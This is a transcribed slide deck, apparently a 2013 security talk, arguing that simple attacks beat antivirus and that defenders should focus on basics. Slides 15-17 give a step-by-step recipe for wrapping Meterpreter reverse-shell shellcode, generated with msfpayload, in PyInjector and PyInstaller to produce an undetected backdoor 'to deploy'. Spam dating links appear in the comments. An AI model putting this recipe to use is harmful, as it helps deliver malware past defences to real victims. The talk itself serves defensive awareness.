Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Give Me Three Things: Anti-Virus Bypass Made Easy

3,342 views

Published on

John Strand shows us 3 simple AV Bypass Techniques!

Published in: Technology
  • Dating direct: ♥♥♥ http://bit.ly/2F4cEJi ♥♥♥
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Dating for everyone is here: ♥♥♥ http://bit.ly/2F4cEJi ♥♥♥
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

Give Me Three Things: Anti-Virus Bypass Made Easy

  1. 1. Security Weekly™ Presents: Give Me Three Things Sometimes, three is bad http://securityweekly.com
  2. 2. Brought To You By: consulting@blackhillsinfosec.com
  3. 3. The Need for Focus • It is easy to get caught up in the latest “Hack of the day” • Let’s talk about • iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X • But, when we get popped, it is going to be something simple • Cool stuff is cool, but the basics will kill you http://hacknaked.tv Copyright 2013
  4. 4. #1 Crappy Malware • Had enough presentations on the “Not so advanced persistent threat?” • Somehow, the belief is if we can make fun of the attackers skill level it makes us….??? • Better? Smarter? • Why? • Because….. http://hacknaked.tv Copyright 2013
  5. 5. Results Matter http://hacknaked.tv Copyright 2013
  6. 6. About that Malware • It tends to be well known • It tends to have AV signatures* • Tracing it back to a specific group can be hard • Anyone can download it • It is not 1337 or even 31337 Just right http://hacknaked.tv Copyright 2013
  7. 7. Poison Ivy http://hacknaked.tv Copyright 2013
  8. 8. Citadel http://hacknaked.tv Copyright 2013
  9. 9. AV Bypass Made Easy • Many of these tools have options to export to a raw string of hex characters • In fact, that does not even matter • We can use Ghost Writing techniques • Simply exporting and re-importing as a script does the trick • Flame did this with Lua This and cookies: Why I pentest http://hacknaked.tv Copyright 2013
  10. 10. Ghost Writing: Creating the Binary http://hacknaked.tv Copyright 2013
  11. 11. Converting to Assembly http://hacknaked.tv Copyright 2013
  12. 12. Editing the Assembly http://hacknaked.tv Copyright 2013
  13. 13. Finalize the Payload http://hacknaked.tv Copyright 2013
  14. 14. Python Injection • Another technique is to: • Convert your payload into Raw output • Import the Raw output into a python script • Convert the Python script into an executable • It is all because the text sections of an .exe not being reviewed by many AV vendors • They would have to write the signature for Python itself • Not likely • Great write up by Mark Baggett • http://tinyurl.com/SANS-580-Python-AV-Bypass http://hacknaked.tv Copyright 2013
  15. 15. Windows AV Bypass - Setup • Create a Windows box with prerequisites • Same as target (32-bit vs. 64-bit) • Install Python: http://www.python.org/ • Add Python to system PATH • Install PyWin32: http://sourceforge.net/projects/pywin32/ • Install PyInstaller: http://www.pyinstaller.org/ • Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip http://hacknaked.tv Copyright 2013
  16. 16. Windows AV Bypass - Config • Extract files from PyInjector • Move pyinjector.py into root of PyInstaller folder • Use msfpayload to generate alphanumeric shellcode (on any machine) • msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d http://hacknaked.tv Copyright 2013 'n' | more • Make sure payload matches architecture! • Within pyinjector.py: • replace: shellcode = sys.argv[1] • with: shellcode = '<msfpayload output>’ • where: <msfpayload output> = output from the above msfpayload command
  17. 17. Windows AV Bypass - Compile • While in the PyInstaller Directory: • python utilsMakespec.py --onefile --noconsole pyinjector.py • python utilsBuild.py pyinjector/pyinjector.spec • New backdoor should be under: • [PyInstaller]/pyinjector/dist/pyinjector.exe • Rename the executable, deploy, profit • Don’t forget your listener!!! http://hacknaked.tv Copyright 2013
  18. 18. Or You Could Just Choose Option 15 OOppttioionn 1155 http://hacknaked.tv Copyright 2013
  19. 19. #2 0-day Dejour • Yeah, another favorite for attackers • There is always another 0-day • Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective • Why? Because it works • They do a lot with volume • What is your patch success percentage? http://hacknaked.tv Copyright 2013
  20. 20. Lessons • Black-list AV is easy to bypass • In fact, we had to do it with Poison Ivy last week • Yeah, a piece of malware 5 years old • The attackers will be exactly as advanced as they need to be • Which is not very advanced http://hacknaked.tv Copyright 2013
  21. 21. Focus and Future Plans • Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system • Get away from Black List Security • Now • Right now • .. I mean after this presentation http://hacknaked.tv Copyright 2013
  22. 22. #3 Users Making “Mistakes” • How could we have a presentation without this? • There is no way hackers would be this successful without users • Ha Ha!!! Users are “dumb” • Yeah.. • Right? • Not so fast sparky http://hacknaked.tv Copyright 2013
  23. 23. We are all Dumb • Or, the pretexts for the attackers are getting really, really good • Some SE pretexts we use are not fair • Major insurance company and a change of coverage • Linked-in merit badges • If the attack is tailored, it is successful http://hacknaked.tv Copyright 2013
  24. 24. Caller ID Spoofing http://hacknaked.tv Copyright 2013
  25. 25. Hail Pentest Geek! http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/ http://hacknaked.tv Copyright 2013
  26. 26. Lessons • Users are going to make mistakes • Not because they are dumb • Well, half of them are below average • Because they are not trained • And because the attackers are good http://hacknaked.tv Copyright 2013
  27. 27. Focus and Future Plans • Hacker Guard Lesson: Once again, focus on attacker actions • Limit the damage the user can do • Implement Firewalls • Implement Software Restriction Policies • Implement Internet Whitelisting • But don’t simply believe the user is stupid • Train them: Securing the Human http://hacknaked.tv Copyright 2013
  28. 28. Conclusions • While bright shiny objects are bright and shiny • We need to come back to basics and fundamentals • We loose sight of that in this industry http://hacknaked.tv Copyright 2013
  29. 29. OCM at Black Hat • Offensive Countermeasures at Black Hat 2013 • http://tinyurl.com/HN TV-BH-2013 http://hacknaked.tv Copyright 2013
  30. 30. End of Line • Hack Naked TV Episodes • http://www.hacknaked.tv • Watch us: • Blip.tv: http://blip.tv/securityweekly • YouTube: http://youtube.com/securityweeklytv • Subscribe via iTunes: • https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2 http://hacknaked.tv Copyright 2013

×